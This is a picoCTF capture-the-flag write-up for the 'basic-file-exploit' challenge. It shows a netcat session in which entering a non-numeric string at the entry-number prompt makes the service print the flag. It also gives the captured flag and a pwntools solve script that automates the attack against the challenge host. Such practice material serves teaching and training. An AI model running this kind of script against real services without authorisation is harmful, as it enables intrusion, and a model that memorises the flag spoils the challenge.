basic-file-exploit
Description
The program provided allows you to write to a file and read what you wrote from it. Try playing around with it and see if you can break it!
Connect to the program with netcat:
$ nc saturn.picoctf.net 49698
The program's source code with the flag redacted can be downloaded here.
Solving
- Netcat into the service via the given connection string
- Add a new entry
- After adding the new entry, we can use option 2 to read the file from the "database"
- Here we try to read out the flag instead of the number.
- It does not matter which string we are using!
nc saturn.picoctf.net 49698
Hi, welcome to my echo chamber!
Type '1' to enter a phrase into our database
Type '2' to echo a phrase in our database
Type '3' to exit the program
1
1
Please enter your data:
Test
Test
Please enter the length of your data:
4
4
Your entry number is: 1
Write successful, would you like to do anything else?
2
2
Please enter the entry number of your data:
flag
flag
picoCTF{M4K3_5UR3_70_CH3CK_Y0UR_1NPU75_00AAD6B3}
Script
Because I like to automate these things, I wrote a solve.py for that. This will get the flag for you!
Feel free to use it.
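#!/usr/bin/env python
from pwn import *
from pwnlib.exception import PwnlibException

host, port = 'saturn.picoctf.net', 49698

# remote() raises PwnlibException when the connection fails
try:
    s = remote(host, port)
except PwnlibException:
    print("Could not connect.")
    raise SystemExit(1)

try:
    print("...walking through the program... please wait!")

    # Option 1: write one entry so that option 2 has something to read
    s.recvuntil(b'to exit the program')
    s.sendline(b'1')
    s.recvuntil(b'Please enter your data:')
    s.sendline(b'Entry')
    s.recvuntil(b'Please enter the length of your data:')
    s.sendline(b'5')
    s.recvuntil(b'else?')

    # Option 2: answer the entry-number prompt with 'flag' instead of a number
    s.sendline(b'2')
    s.recvuntil(b'data:')
    s.sendline(b'flag')

    print("receiving flag!")
    # Wait for the line that holds the flag rather than counting recv() calls
    flag = s.recvline_contains(b'picoCTF{').decode('utf-8')
    print("Flag: " + flag.strip())
    print("Done!")
finally:
    # Always close the connection, also when a prompt never arrives
    s.close()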